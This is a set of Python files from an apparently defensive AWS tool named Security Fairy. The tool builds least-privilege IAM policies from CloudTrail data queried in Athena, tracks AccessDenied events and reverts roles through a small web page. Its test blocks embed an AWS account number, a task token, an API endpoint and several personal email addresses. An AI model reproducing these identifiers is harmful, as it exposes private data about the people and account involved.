from aws_logs.cloudtrail
where year = '{year}'
and month >= '{month}'
and regexp_like(useridentity.arn, '{escaped_arn}\/.+')
group by useridentity.arn
, eventsource
"""
logger.info(hql)
output = f's3://{s3_bucket}/tables'
config = {
'OutputLocation': output,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'
}
}
athena_client = SESSION.client('athena')
execution = athena_client.start_query_execution(QueryString=hql,
ResultConfiguration=config)
logger.info("Query ID:")
logger.info(execution['QueryExecutionId'])
return execution['QueryExecutionId']
def build_escaped_arn(entity_arn):
"""Format ARN"""
split_arn = re.split('/|:', entity_arn)
escaped_arn = "arn:aws:sts::" + split_arn[4] + ":assumed-role\\/" + split_arn[6]
logger.debug(escaped_arn)
return escaped_arn
if __name__ == '__main__':
# arn:aws:sts::281782457076:assumed-role\/1s_tear_down_role\/.+
# lambda_handler(
# {
# "entity_arn": "arn:aws:iam::281782457076:assumed-role/1s_tear_down_role",
# "num_days": "-30",
# "s3_bucket": "1s-potato-east"
# },
# {}
# )
pass
--- FILE SEPARATOR ---
import string
import logging
from setup_logger import create_logger
logger = create_logger(name="aws_api_tools.py")
def api_response(statusCode=500, headers={'Content-Type':'text/html'}, body='Internal Service Error'):
if statusCode < 100 or statusCode > 599:
raise ValueError('Invalid HTTP statusCode')
return_value = {
'statusCode': statusCode,
'headers' : headers,
'body' : body
}
logger.debug(return_value)
return return_value
def get_domain_from_proxy_api_gateway(event):
if event['headers'] is None:
return "https://testinvocation/approve"
if 'amazonaws.com' in event['headers']['Host']:
return "https://{domain}/{stage}/".format( domain=event['headers']['Host'],
stage=event['requestContext']['stage'])
else:
return "https://{domain}/".format(domain=event['headers']['Host'])
def api_website(website_body='', safe_substitute_dict={'domain':'http://example.domain'}):
logger.debug(website_body)
logger.debug(safe_substitute_dict)
body = website_body if website_body else \
"""
<html>
<body>
<title>Webpage serverd from API Gateway and Lambda</title>
<h1>This is an example of an HTTP Get Responses for a Lambda/API Gateway served website</h1>
The domain is: $domain
</body>
</html>
"""
logger.debug(body)
if website_body and safe_substitute_dict:
for variable in safe_substitute_dict:
if '${variable}'.format(variable=variable) not in body:
logger.debug('${variable}'.format(variable=variable))
raise ValueError('A variable to be replaced in the body must be represented by a $variable')
compiled_body = string.Template(body).safe_substitute(safe_substitute_dict)
logger.debug(compiled_body)
return api_response(statusCode=200, body=compiled_body)
--- FILE SEPARATOR ---
import logging
import json
import re
class IAMPolicy:
def __init__(self, logging_level = logging.DEBUG):
logging.basicConfig(level=logging_level)
self.statements = []
self.service_actions = {}
self.max_policy_size = {
'user' : 2048, # User policy size cannot exceed 2,048 characters
'role' : 10240, # Role policy size cannot exceed 10,240 characters
'group': 5120 # Group policy size cannot exceed 5,120 characters
}
def __add_statement__(self, statement):
if not isinstance(statement, IAMStatement):
raise Exception('This Method only supports objects of type IAMStatement')
self.statements.append(statement)
def add_actions(self, statement_actions):
for statement_action in statement_actions:
self.add_action(statement_action)
def add_action(self, statement_action):
split_statement_action = statement_action.split(':')
if len(split_statement_action) != 2:
raise InvalidStatementAction('Invalid Statement: {action} Statement must be \'service:api-action\'.'.format(action=action))
service = self.__get_service_alias__(split_statement_action[0])
if service == 'lambda':
# Checks for extraneous lambda api version information:
# e.g. lambda:ListTags20170331
# lambda:GetFunctionConfiguration20150331v2"
# lambda:"UpdateFunctionCode20150331v2"
api_version_info = re.findall(r"(\d+v\d+)|(\d+)", split_statement_action[1])
if api_version_info:
for api_version in api_version_info[0]:
logging.debug(api_version)
if api_version is not '':
action = split_statement_action[1].replace(api_version,'')
else:
action = split_statement_action[1]
else:
action = split_statement_action[1]
logging.debug(statement_action)
logging.debug(self.service_actions.get(service))
if self.service_actions.get(service) is None:
self.service_actions[service] = []
if not action in self.service_actions[service]:
self.service_actions[service].append(action)
logging.debug("Action added: {service}:{action}".format(service=service, action=action))
def __get_service_alias__(self, service):
service_aliases = {
"monitoring": "cloudwatch"
}
return service_aliases.get(service, service)
def __build_statements__(self):
for service in self.service_actions:
actions_per_service = []
for action in self.service_actions[service]:
actions_per_service.append(service+":"+action)
statement = IAMStatement( effect="Allow",
actions=actions_per_service,
resource="*",
sid='SecurityFairyBuilt{service}Policy'.format(service=service.capitalize())
)
self.__add_statement__(statement)
def get_policy(self):
self.__build_statements__()
built_policy_statements = []
for statement in self.statements:
built_policy_statements.append(statement.get_statement())
policy = {
"Version": "2012-10-17",
"Statement": built_policy_statements
}
logging.debug(policy)
return policy
def print_policy(self):
return json.dumps(self.get_policy())
class IAMStatement:
def __init__(self, effect, actions, resource, sid='', logging_level = logging.DEBUG):
logging.basicConfig(level=logging_level)
self.validate_statement(effect, actions, resource)
self.actions = actions
self.resource = resource
self.effect = effect
if sid != '':
self.sid = sid
def validate_statement(self, effect, actions, resource):
if not effect.lower() in ['allow', 'deny']:
logging.debug(effect)
raise InvalidStatementAction("Valid Effects are 'Allow' and 'Deny'.")
if not resource == '*':
logging.debug(resource)
raise Exception('Invalid Resource.')
logging.debug(actions)
for action in actions:
if len(action.split(':')) != 2:
raise InvalidStatementAction('Invalid Statement: {action} Statement must be \'service:api-action\'.'.format(action=action))
self.actions = actions
def get_statement(self):
if self.actions == []:
raise Exception('This statement has no Actions')
statement = {
"Effect": self.effect,
"Resource": self.resource,
"Action": self.actions
}
if self.sid != '':
statement['Sid'] = self.sid
return statement
--- FILE SEPARATOR ---
import boto3
import logging
from botocore.exceptions import ProfileNotFound
class AWS_Session:
def __init__(self, region_name='us-east-1', profile_name='training'):
self.region_name = region_name
self.profile_name = profile_name
self.session = self.__create_new_session__()
def __create_new_session__(self):
logging.debug("Creating a new boto3 Session object.")
session = ''
try:
session = boto3.session.Session(profile_name=self.profile_name,
region_name=self.region_name)
logging.debug(session)
except ProfileNotFound as pnf:
session = boto3.session.Session()
return session
def get_session(self):
if not self.session is None or self.session.get_credentials().__is_expired():#.__is_expired__():
logging.debug("AWS Session expired.")
self.session = self.__create_new_session__()
return self.session
--- FILE SEPARATOR ---
"""Build_Cloudtrail_Table
Create the CloudTrail Logs table for Athena use.
See the AWS documentation for Athena here:
http://docs.aws.amazon.com/athena/latest/ug/getting-started.html
"""
import os
import sys
import json
from datetime import datetime, timedelta
import logging
import boto3
from botocore.exceptions import ProfileNotFound
from time import sleep
# These parameters should remain static
TIME = datetime.utcnow()
AMZ_DATE = TIME.strftime('%Y%m%dT%H%M%SZ')
DATE_STAMP = TIME.strftime('%Y%m%d')
PROFILE = 'sandbox'
LOG_LEVEL = logging.DEBUG
SUCCESS = "SUCCESS"
FAILED = "FAILED"
try:
SESSION = boto3.session.Session(
profile_name=PROFILE,
region_name='us-east-1'
)
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
try:
from urllib import HTTPError, build_opener, HTTPHandler, Request
except ImportError:
from urllib.error import HTTPError
from urllib.request import build_opener, HTTPHandler, Request
def send(event, context, response_status, reason=None, response_data=None, physical_resource_id=None):
response_data = response_data or {}
response_body = json.dumps(
{
'Status': response_status,
'Reason': reason or "See the details in CloudWatch Log Stream: " + context.log_stream_name,
'PhysicalResourceId': physical_resource_id or context.log_stream_name,
'StackId': event['StackId'],
'RequestId': event['RequestId'],
'LogicalResourceId': event['LogicalResourceId'],
'Data': {'ConfigJson': response_data}
}
)
logging.debug("Sending Response to CloudFormation")
logging.debug(response_body)
opener = build_opener(HTTPHandler)
request = Request(event['ResponseURL'], data=response_body.encode('utf-8'))
request.add_header('Content-Type', '')
request.add_header('Content-Length', len(response_body.encode('utf-8')))
request.get_method = lambda: 'PUT'
response = opener.open(request)
try:
response = opener.open(request)
print("Status code: {}".format(response.getcode()))
print("Status message: {}".format(response.msg))
return True
except HTTPError as exc:
print("Failed executing HTTP request: {}".format(exc.code))
return False
def save_query(cloudtrail_logs_bucket):
"""Store the CloudTrail table creation query
"""
athena = SESSION.client('athena')
acct_number = SESSION.client('sts').get_caller_identity().get('Account')
query_list = athena.list_named_queries()
name_list = []
for query in query_list.get("NamedQueryIds"):
check = athena.get_named_query(
NamedQueryId=query
)
name_list.append(check['NamedQuery'].get('Name'))
if "cloudtrail_logs" in name_list:
print("This query is already saved.")
else:
response = athena.create_named_query(
Name="cloudtrail_logs",
Description="Table of CloudTrail Logs created by Security Fairy.",
Database="aws_logs",
QueryString="""
create external table if not exists aws_logs.cloudtrail (
eventVersion string,
userIdentity
struct<
type: string,
principalId: string,
arn: string,
accountId: string,
userName: string,
invokedBy: string,
accesskeyid:string,
sessioncontext:
struct<
attributes:
struct<
mfaauthenticated:string,
creationdate:string
>,
sessionIssuer:
struct<
type:string,
principalId:string,
arn:string,
accountId:string,
userName:string
>
>
>,
eventTime string,
eventSource string,
eventName string,
awsRegion string,
sourceIPAddress string,
userAgent string,
errorCode string,
errorMessage string,
requestID string,
eventID string,
resources
array<
struct<
ARN:string,
accountId:string,
type:string
>
>,
eventType string,
apiVersion string,
readOnly boolean,
recipientAccountId string,
sharedEventID string,
vpcEndpointId string
)
partitioned by (region STRING, year STRING, month STRING, day STRING)
row format serde 'com.amazon.emr.hive.serde.CloudTrailSerde'
stored as inputformat 'com.amazon.emr.cloudtrail.CloudTrailInputFormat'
outputformat 'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
location 's3://{cloudtrail_bucket}/AWSLogs/{account_number}/CloudTrail/'
;""" \
.format(cloudtrail_bucket=cloudtrail_logs_bucket,
account_number=acct_number)
)
return response
def build_database(s3_bucket):
"""Build the logs database in Athena
"""
athena = SESSION.client('athena')
output = 's3://{s3_bucket}/tables'.format(s3_bucket=s3_bucket)
config = {
'OutputLocation': output,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'
}
}
response = athena.start_query_execution(
QueryString="create database if not exists aws_logs;",
ResultConfiguration=config
)
def execute_cloudtrail_table_creation(s3_bucket):
"""Create the CloudTrail Logs table using the saved query
"""
athena = SESSION.client('athena')
query_list = athena.list_named_queries()
name_list = []
output = 's3://{s3_bucket}/tables'.format(s3_bucket=s3_bucket)
config = {
'OutputLocation': output,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'
}
}
run_query = ''
for query_id in query_list.get("NamedQueryIds"):
query_obj = athena.get_named_query(
NamedQueryId=query_id
)
query_details = query_obj['NamedQuery']
if query_details.get('Name') == 'cloudtrail_logs':
run_query = query_details.get('QueryString')
response = athena.start_query_execution(
QueryString=run_query,
ResultConfiguration=config
)
return response
def build_inital_partitions(security_fairy_bucket, cloudtrail_bucket, account):
athena_client = SESSION.client('athena')
output = f"s3://{security_fairy_bucket}/security-fairy-partition-queries"
year = datetime.now().year
month = datetime.now().month
day = datetime.now().day
regions = ['us-west-2',
'us-west-1',
'us-east-2',
'us-east-1',
# 'ap-south-1',
# 'ap-northeast-2',
# 'ap-southeast-1',
# 'ap-southeast-2',
# 'ap-northeast-1',
# 'ca-central-1',
# 'cn-north-1',
# 'eu-central-1',
# 'eu-west-1',
# 'eu-west-2',
# 'eu-west-3',
# 'sa-east-1',
# 'us-gov-west-1'
]
config = {
'OutputLocation': output,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'
}
}
for region in regions:
try:
for x in range(30):
new_time = datetime.now() - timedelta(x)
# sleep(.5)
response = athena_client.start_query_execution(
QueryString = f"ALTER TABLE aws_logs.cloudtrail ADD IF NOT EXISTS PARTITION (region='{region}', year={new_time.year}, month={new_time.month}, day={new_time.day}) LOCATION 's3://{cloudtrail_bucket}/AWSLogs/{account}/CloudTrail/{region}/{new_time.year}/{new_time.month}/{new_time.day}/'; ",
ResultConfiguration=config
)
#change to logger
print(response)
except Exception as e:
print(e)
def lambda_handler(event, context):
"""Lambda Handler for Build_Cloudtrail_Table
"""
logging.debug(json.dumps(event))
# Setup Logging, delete other loggers
root = logging.getLogger()
if root.handlers:
for handler in root.handlers:
root.removeHandler(handler)
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=LOG_LEVEL, datefmt='%Y-%m-%dT%H:%M:%S')
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.debug("Environment Variables:")
logging.info("Start Execution")
try:
cloudtrail_bucket = os.environ["cloudtrail_bucket"]
security_fairy_bucket = os.environ["security_fairy_bucket"]
account = os.environ["aws_account"]
log_level = os.environ.get('LOG_LEVEL','INFO') # Logging Level
saved = save_query(cloudtrail_bucket)
logging.debug(saved)
db = build_database(cloudtrail_bucket)
logging.debug(db)
executed = execute_cloudtrail_table_creation(cloudtrail_bucket)
build_inital_partitions(security_fairy_bucket, cloudtrail_bucket, account)
logging.debug(executed)
logging.info("Successful Execution")
send(event, context, "SUCCESS")
except Exception as error:
logging.info("Failed Execution")
logging.info(error)
send(event, context, "FAILED")
return "Error"
if __name__ == '__main__':
lambda_handler({}, {})
--- FILE SEPARATOR ---
import boto3
import gzip
import json
import logging
import os
import re
from tools import Arn
from setup_logger import create_logger
from aws_session_manager import AWS_Session
from botocore.exceptions import ProfileNotFound
logger = create_logger(name="denied_notification.py")
try:
SESSION = boto3.session.Session(profile_name='training',
region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
# global SESSION
# SESSION = SESSION.get_session()
topic_arn = os.environ.get('sns_arn', 'arn:aws:sns:us-east-1:281782457076:security_fairy_topic')
dynamodb_table = os.environ.get('dynamodb_table', 'arn:aws:dynamodb:us-east-1:281782457076:table/security_fairy_dynamodb_table')
# Extract Bucket and Key from an SNS notification
# message = json.loads(event['Records'][0]['Sns']['Message'])
# bucket = message['s3Bucket']
# key = message['s3ObjectKey'][0]
# Extracted Bucket and Key from S3 event notification
bucket = event['Records'][0]['s3']['bucket']['name']
key = event['Records'][0]['s3']['object']['key']
# where to save the downloaded file
file_path = '/tmp/cloudtraillogfile.gz'
# downloads file to above path
boto3.client('s3').download_file(bucket, key, file_path)
# opens gz file for reading
gzfile = gzip.open(file_path, 'r')
# loads contents of the Records key into variable (our actual cloudtrail log entries!)
records = json.loads(gzfile.readlines()[0])['Records']
access_denied_records = check_records_for_error_code(records)
security_fairy_access_denied_records = get_security_fairy_audited_entities(access_denied_records)
write_denied_actions_to_dynamodb(security_fairy_access_denied_records, dynamodb_table)
send_access_denied_notifications(access_denied_records, topic_arn)
def check_records_for_error_code(records, error_codes = ['AccessDenied', 'AccessDeniedException','Client.UnauthorizedOperation']):
matched_error_records = []
for record in records:
if record.get('errorCode', None) in error_codes:
logger.debug(record)
extracted_information = {}
arn = Arn(record['userIdentity'].get('arn', None))
role_name = arn.get_entity_name()
service_name = arn.get_service()
extracted_information['arn'] = arn.get_full_arn()
extracted_information['error_code'] = record['errorCode']
extracted_information['denied_action'] = service_name + ':' + record['eventName']
if not extracted_information in matched_error_records:
logger.info('extracted_information doesn\'t already exist in list of access denieds')
matched_error_records.append(extracted_information)
logger.debug(matched_error_records)
return matched_error_records
def send_access_denied_notifications(access_denied_records, topic_arn):
if access_denied_records:
response = boto3.client('sns', region_name = 'us-east-1')\
.publish( TopicArn=topic_arn,
Message=json.dumps(access_denied_records),
Subject='Automated AWS Notification - Access Denied')
def write_denied_actions_to_dynamodb(access_denied_records, dynamodb_table):
#take in the below:
# [{"error_code": "AccessDenied", "arn": "arn:aws:sts::281782457076:assumed-role/serverless_api_gateway_step_functions/BackplaneAssumeRoleSession", "denied_action": "states:StartExecution"}, {"error_code": "AccessDenied", "arn": "arn:aws:sts::281782457076:assumed-role/serverless_api_gateway_step_functions/BackplaneAssumeRoleSession", "denied_action": "states:StartExecution"}]
# read the dynamodb_table, if the action already exists, do nothing
dynamodb_client = SESSION.client('dynamodb')
for record in access_denied_records:
entity_arn = record['arn']
execution_id, existing_denied_actions = get_existing_denied_actions(entity_arn, dynamodb_table)
updated_denied_actions = existing_denied_actions
if not record['denied_action'] in existing_denied_actions:
updated_denied_actions.append(record['denied_action'])
dynamodb_client.update_item(TableName=dynamodb_table,
Key={
"execution_id": {
"S": execution_id
}
},
AttributeUpdates={
"denied_actions": {
"Value":{"SS": updated_denied_actions}
}
})
def get_security_fairy_audited_entities(access_denied_records):
audited_entities = []
for record in access_denied_records:
entity = Arn(record['arn'])
entity.convert_assumed_role_to_role()
entity_arn = entity.get_full_arn()
logger.debug(entity_arn)
if entity.is_role() and is_access_denied_security_fairy_audited_role(entity_arn):
logger.debug('Adding access_denied_record to list')
record['arn'] = entity_arn
audited_entities.append(record)
logger.info(audited_entities)
return audited_entities
def get_existing_denied_actions(entity_arn, dynamodb_table):
dynamodb_client = SESSION.client('dynamodb')
response = dynamodb_client.scan(
TableName=dynamodb_table,
IndexName='entity_arn',
AttributesToGet=[
'execution_id',
'entity_arn',
'denied_actions'
],
ScanFilter={
'entity_arn': {
'AttributeValueList': [
{
'S': entity_arn
}
],
'ComparisonOperator': 'EQ'
}
}
)['Items'][0]
existing_denied_actions = [] if response.get('denied_actions') is None else response['denied_actions']['SS']
execution_id = response['execution_id']['S']
logger.info(existing_denied_actions)
return execution_id, existing_denied_actions
def is_access_denied_security_fairy_audited_role(role_arn):
iam_client = SESSION.client('iam')
#Consumes an role arn and examines its attached policies to see
#if they were created by security-fairy
role = Arn(role_arn)
role_name = role.get_entity_name()
logger.info(role_name)
attached_policies = iam_client.list_attached_role_policies(RoleName=role_name)
# Examines all attached policies and search for an attached policy with the
# following format: *_security_fairy_revised_policy
# (see security_fairy_revised_policy_approve.py line 58)
logger.debug("Policies attached to {}:".format(role.get_full_arn()))
for policy in attached_policies['AttachedPolicies']:
logger.info(policy['PolicyName'])
if '-security-fairy-revised-policy' in policy['PolicyName']:
return True
return False
if __name__ == '__main__':
# arn = 'arn:aws:iam::281782457076:role/1s_tear_down_role'
# logging.info(is_access_denied_security_fairy_audited_role(arn))
access_denied_records = [{"error_code": "AccessDenied", "arn": "arn:aws:sts::281782457076:assumed-role/serverless_api_gateway_step_functions/BackplaneAssumeRoleSession", "denied_action": "states:StartExecution"},
{"error_code": "AccessDenied", "arn": "arn:aws:sts::281782457076:assumed-role/1s_tear_down_role/potato", "denied_action": "route53:CreateHostedZone"},
{"error_code": "AccessDenied", "arn": "arn:aws:iam::281782457076:user/dbrewer@experlogix.com", "denied_action": "codebuild:StartBuild"},
{"error_code": "AccessDenied", "arn": "arn:aws:iam::281782457076:user/tj.eaglescout@gmail.com", "denied_action": "codebuild:StartBuild"},
{"error_code": "AccessDenied", "arn": "arn:aws:iam::281782457076:user/chase.thompson-baugh@simplymac.com", "denied_action": "codebuild:StartBuild"},
{"error_code": "AccessDenied", "arn": "arn:aws:iam::281782457076:user/steven.nourse@vivintsolar.com", "denied_action": "codebuild:StartBuild"},
{"error_code": "AccessDenied", "arn": "arn:aws:iam::281782457076:role/1s_tear_down_role", "denied_action": "codebuild:StartBuild"}]
# dynamodb_table = 'security_fairy_dynamodb_table'
# existing_denied_actions('arn:aws:iam::281782457076:role/1s_tear_down_role', dynamodb_table)
security_fairy_access_denied_records = get_security_fairy_audited_entities(access_denied_records)
write_denied_actions_to_dynamodb(security_fairy_access_denied_records,'security_fairy_dynamodb_table')
# if __name__ == '__main__':
# EVENT = {
# "Records": [
# {
# "eventVersion": "2.0",
# "eventTime": "2017-08-23T17:27:20.482Z",
# "requestParameters": {
# "sourceIPAddress": "184.72.102.183"
# },
# "s3": {
# "configurationId": "log_posted",
# "object": {
# "eTag": "f88cc0ba387febb9d1922bcf3624e249",
# "sequencer": "00599DBAF77B4804AE",
# "key": "AWSLogs/281782457076/CloudTrail/us-east-1/2017/08/23/281782457076_CloudTrail_us-east-1_20170823T1725Z_Nobz9PDTfkS2itSG.json.gz",
# "size": 4342
# },
# "bucket": {
# "arn": "arn:aws:s3:::1strategy-training-traillogs",
# "name": "1strategy-training-traillogs",
# "ownerIdentity": {
# "principalId": "A3F4AZ9K861LVS"
# }
# },
# "s3SchemaVersion": "1.0"
# },
# "responseElements": {
# "x-amz-id-2": "qakr7pYcVWfsXM/BEncmZ/zQVPQnIAyN5ggRIF+9/+5JhAhhmMDZDJunlhhFowOKzGF9mNtF1Ys=",
# "x-amz-request-id": "5A68EDF6D1F0C933"
# },
# "awsRegion": "us-west-2",
# "eventName": "ObjectCreated:Put",
# "userIdentity": {
# "principalId": "AWS:AROAI6ZMWVXR3IZ6MKNSW:i-0c91c32104e81c79d"
# },
# "eventSource": "aws:s3"
# }
# ]
# }
# lambda_handler(EVENT, {})
--- FILE SEPARATOR ---
"""Email Approval Request
Sends an email to the user with an approval url.
"""
import boto3
import logging
from requests.utils import quote
from botocore.exceptions import ProfileNotFound
from setup_logger import create_logger
logger = create_logger(name="email_approval_request.py")
try:
SESSION = boto3.session.Session(profile_name='training',
region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
""" Executed by the Lambda service.
Sends an approval URL to the user via SNS.
"""
execution_id = event['execution_id']
task_token = quote(event['task_token'], safe='')
api_endpoint = event['api_endpoint']
approval_url = '{api_endpoint}approve?execution-id={execution_id}&task-token={tasktoken}'\
.format(api_endpoint=api_endpoint,
execution_id=execution_id,
tasktoken=task_token
)
sns_client = SESSION.client('sns')
sns_arn = event['sns_arn']
# Build message
message = 'Approve changes from Security Fairy here: {approval_url}'\
.format(approval_url=approval_url)
logger.debug(message)
response = sns_client.publish(
TopicArn=sns_arn,
Message="{message}".format(message=message),
Subject='Security Fairy Permissions Request')
logger.debug(response)
if __name__ == '__main__':
EVENT = {
'execution_id':'f0774f6d-3986-4478-be43-23b62cfc65c0',
'task_token': "AAAAKgAAAAIAAAAAAAAAAcMqTWc6Y9lUsccSZSoCCn8NOd71LbD98x2dU0LwJusNdxUOi7wwuwr4SmXXyCAfFIefCI/rnFfDeiOa4cN0uSF8a7uku4bN50BgFzcq7Aw1hY2V0rrE4KpSWJPVBUZ38LPwCXlvsFncAGOVRs9DDTj4docBIjwKjt2DBFEiaVQ6byk4zbsZlP0muYGNYR0gY9O6yh4Pf/zCfbRIvpZCiAdOV3kz2nkRH8YBCBCa1FvPPyPXWwlIsyL2ijdHC7G0//Xvv6ANmkYd9qCRwqSUYBm8nhTb0kFNWDBzsdEoEU9nFg2xWGvte7TaELVGGDVsk2y0YaDp4E6UwRiKNu0qIDeTA5OrpjVYurh/D3Pd06vc2aRpFQE9HxzCSJrg8lNS3jw3vLPXJzisourVu1SGZzHLOIEeqUDk4lWVGMylhm/EXefN2lmRC8p4NWIrtd9KrMJ3WlkrblS/aGzqCy3VRlmFITjHWws1+yvtBC0u3s99aYTvXXHylHCceE+EbL0qsES1qRrDtUdTHpJcB6MiaMf9Vbn2faa+OLJjnI8Y6J3uqFWl8yYFR41Cwc0RxH1RnsiQehwXLLiqvBSz4y+I5PI=",
'api_endpoint': "https://gndl1fc1ii.execute-api.us-east-1.amazonaws.com/Prod",
'sns_arn': 'arn:aws:sns:us-east-1:281782457076:security_fairy_topic'
}
lambda_handler(EVENT, {})
--- FILE SEPARATOR ---
"""Get Task Token
Retrieves the correct Task Token from the
Step Functions API, then updates the event
object for the next Lambda function.
"""
import boto3
import logging
from botocore.exceptions import ProfileNotFound
try:
SESSION = boto3.session.Session(profile_name='training')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
""" Executed by the Lambda service.
Returns an Event object that's been updated
with the appropriate SNS Task Token.
"""
sfn_client = SESSION.client('stepfunctions')
activity_task = sfn_client.get_activity_task(activityArn=event['activity_arn'])
event['task_token'] = activity_task['taskToken']
logging.debug(event)
return event
--- FILE SEPARATOR ---
"""Build_Cloudtrail_Table
Create the CloudTrail Logs table for Athena use.
See the AWS documentation for Athena here:
http://docs.aws.amazon.com/athena/latest/ug/getting-started.html
"""
import os
import sys
import json
import logging
import boto3
from datetime import datetime
from botocore.exceptions import ProfileNotFound
try:
SESSION = boto3.session.Session(
profile_name='sandbox',
region_name='us-east-1'
)
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(events, context):
cloudtrail_bucket = os.environ['cloudtrail_bucket']
security_fairy_bucket = os.environ['security_fairy_bucket']
account = os.environ['aws_account']
athena_client = SESSION.client('athena')
output = f"s3://{security_fairy_bucket}/security-fairy-partition-queries"
year = datetime.now().year
month = datetime.now().month
day = datetime.now().day
regions = ['us-west-2',
'us-west-1',
'us-east-2',
'us-east-1',
'ap-south-1',
'ap-northeast-2',
'ap-southeast-1',
'ap-southeast-2',
'ap-northeast-1',
'ca-central-1',
'cn-north-1',
'eu-central-1',
'eu-west-1',
'eu-west-2',
'eu-west-3',
'sa-east-1',
'us-gov-west-1'
]
config = {
'OutputLocation': output,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'
}
}
for region in regions:
try:
response = athena_client.start_query_execution(
QueryString=f"ALTER TABLE cloudtrail ADD PARTITION (region='{region}', year={year}, month={month}, day={day}) LOCATION 's3://{cloudtrail_bucket}/AWSLogs/{account}/CloudTrail/{region}/{year}/{month}/{day}/'",
ResultConfiguration=config
)
#change to logger
print(response)
except Exception as e:
print(e)
--- FILE SEPARATOR ---
import boto3
import json
import logging
import os
import re
from aws_entity import AWSEntity
from setup_logger import create_logger
from aws_api_tools import api_response
from aws_api_tools import api_website
from aws_api_tools import get_domain_from_proxy_api_gateway
from botocore.exceptions import ProfileNotFound
from boto3.dynamodb.conditions import Key
logger = create_logger(name = "revert.py", logging_level=logging.INFO)
try:
SESSION = boto3.session.Session(profile_name='sandbox',
region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
method = event['httpMethod']
if method == 'GET':
logger.info('Request was an HTTP GET Request')
return get_response(event)
if method == 'POST':
logger.info('Request was an HTTP POST Request')
posted_arn = json.loads(event['body'])['entity_arn']
logger.info('Body: {}'.format(posted_arn))
aws_entity = AWSEntity(posted_arn)
return post_response(aws_entity)
return api_response()
def get_response(event):
entities = get_all_iam_audited_entities()
# logger.info(type(entities))
existing_entities = nosql_to_list_of_dicts(entities)
for entity in existing_entities[0]:
logging.debug(entity)
logging.debug(type(entity))
domain = get_domain_from_proxy_api_gateway(event)
body = """
<html>
<body bgcolor="#E6E6FA">
<head>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<style>
.code {
max-height: 500px;
max-width: 900px;
overflow: scroll;
text-align: left;
margin-bottom: 20px;
}
th, td {
text-align: left;
padding: 15px;
height: 50px;
vertical-align: top;
border-bottom: 1px solid #ddd;
}
td {
font-size:x-small;
}
</style>
<script>
var dict = {};
function submitRequest(revert){
dict["entity_arn"] = document.getElementById("entity_arn").value;
$.ajax({
type: 'POST',
headers: {
'Content-Type':'application/json',
'Access-Control-Allow-Origin': '*',
'Accept':'text/html'
},
url:'$domain' + 'revert',
crossDomain: true,
data: JSON.stringify(dict),
dataType: 'text',
success: function(responseData) {
document.getElementById("output").innerHTML = responseData;
},
error: function (responseData) {
alert('POST failed: '+ JSON.stringify(responseData));
}
});
};
function redirect(){
var name= document.getElementById("entity_arn").value.split("/")[1];
var url = "https://console.aws.amazon.com/iam/home?region=us-east-1#/roles/"+name;
document.location.href = url;
};
$(document).ready(function(){
//document.getElementById("output").innerHTML = JSON.stringify({}, null, "\t");
$("#revert").click(function(){
console.log("Approve button clicked");
submitRequest("revert");
setTimeout(redirect,4000);
});
$("#cancel").click(function(){
console.log("Cancel button clicked");
setTimeout(redirect,500);
});
});
</script>
</head>
<body>
<center>
<title>IAM Security Fairy</title>
<h1><span class="glyphicon glyphicon-fire text-danger" ></span> IAM Security Fairy</h1>
<div class="code"><pre>
<table class="code">
<tr>
<th>Execution Id</th>
<th>Role ARN</th>
<th>Original Managed Policies</th>
</tr>
$security_fairy_entities_list
</table>
</pre></div>
<div class="code"><pre id='output' style="visibility:hidden;"></pre></div>
<div class="code">Enter the arn of the role you would like to revert:<br>
<form style= "display: inline-block;" action="" method="post">
<textarea rows="1" cols="40" name="text" id="entity_arn" placeholder="arn:aws:iam::0123456789:role/roleName"></textarea>
</form>
<button style= "display: inline-block;margin-bottom: 20px;" class="btn btn-primary" id='revert'>Revert</button>
<button style= "display: inline-block;margin-bottom: 20px;" class="btn btn-danger" id='cancel'>Cancel</button>
</div>
</center>
</body>
</html>"""
logger.info(existing_entities[0])
security_fairy_entities_list = ''
for entity in existing_entities:
table_row = """<tr>
<td>{execution_id}</td>
<td>{entity_arn}</td>
<td>""".format(execution_id=entity['execution_id'],
entity_arn=entity['entity_arn'])
for policy in entity['existing_policies']:
table_row+= "{policy}<br>".format(policy=policy.split(':')[5])
table_row+="</td></tr>"
security_fairy_entities_list += table_row
safe_substitute_dict = dict(domain = domain, security_fairy_entities_list=security_fairy_entities_list)
return api_website(website_body=body, safe_substitute_dict=safe_substitute_dict)
def get_all_iam_audited_entities():
dynamodb_client = SESSION.client('dynamodb')
response_item = dynamodb_client.scan( TableName='security_fairy_dynamodb_table',
AttributesToGet=[
'execution_id',
'entity_arn',
'existing_policies'
])['Items']
logger.info(response_item)
logger.info(type(response_item))
return response_item
def post_response(aws_entity):
try:
revert_role_managed_policies(aws_entity)
except Exception as e:
# Generic "catch-all exception"
logger.error(e)
return api_response(body='Error - Role wasn\'t reverted properly.')
return api_response(statusCode=200, headers={"Access-Control-Allow-Origin":"*", "Content-Type":"text/html"}, body='Success: The IAM Role has had it\'s pre-security fairy permissions established')
def revert_role_managed_policies(aws_entity):
"""
Reverts role to pre-security fairy permissions
"""
if not aws_entity.is_role():
raise ValueError("The submitted ARN must be for a role.")
